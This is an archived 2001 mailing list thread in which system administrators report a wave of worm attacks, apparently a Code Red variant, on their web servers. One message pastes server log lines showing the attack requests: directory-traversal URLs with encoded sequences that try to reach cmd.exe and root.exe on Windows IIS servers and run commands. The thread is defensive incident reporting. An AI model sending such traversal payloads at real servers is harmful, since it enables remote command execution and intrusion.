[ale] CodeRed attacks, here we go again.

Michael Smith MSmith at webtonetech.com
Tue Sep 18 10:28:26 EDT 2001 

Ditto here.  400 hits in 2 hours.  Looks like another Code Red Variant......

Mike

-----Original Message-----
From: Terry Lee Tucker [mailto:terry at esc1.com]
To: ale at ale.org
Sent: Tuesday, September 18, 2001 10:24 AM
To: SAngell at nan.net; ale at ale.org
Subject: Re: [ale] CodeRed attacks, here we go again.


I'm getting hit with the following:

208.5.209.246 - - [18/Sep/2001:10:30:26 -0400] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 283
208.5.209.246 - - [18/Sep/2001:10:30:27 -0400] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 281
208.5.209.246 - - [18/Sep/2001:10:30:28 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
208.5.209.246 - - [18/Sep/2001:10:30:30 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
208.5.209.246 - - [18/Sep/2001:10:30:31 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
208.5.209.246 - - [18/Sep/2001:10:30:36 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
208.5.209.246 - - [18/Sep/2001:10:30:37 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
208.5.209.246 - - [18/Sep/2001:10:30:39 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
HTTP/1.0"
404 338
208.5.209.246 - - [18/Sep/2001:10:30:40 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
208.5.209.246 - - [18/Sep/2001:10:30:41 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304

Obviously, someone is trying to get something from a windoze box.

SAngell at nan.net wrote:
> 
> I am being flooded by Code Red attacks originating from network
205.152.x.x all
> by the variant which is attempting to drop the trojan backdoor on to my
servers.
> either root.exe or explorer.exe. This attack is worse that any I have
previously
> seen with hundreds of attempts in the last 5 minutes.
> 
> Anyone else witnessing these?
> 
> \_\_\_\_\_\_\_\_\_\_\_/_/_/_/_/_/_/_/_/_/_/
> \_    Steve Angell,  MCSE, CCNA           _/
> \_    MIS Operations Manager               _/
> \_    TSYS Total Debt Management  _/
> \_    Norcross, GA                                   _/
> \_    Phone 770-409-5570                    _/
> \_    Fax      770-416-1752                   _/
> \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
> 
> --
> To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message
body.

-- 
Sparta, NC 28675 USA
336.372.6812
http://www.esc1.com
The Gates of hell shall NOT prevail...
--
To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message
body.
--
To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.

More information about the Ale mailing list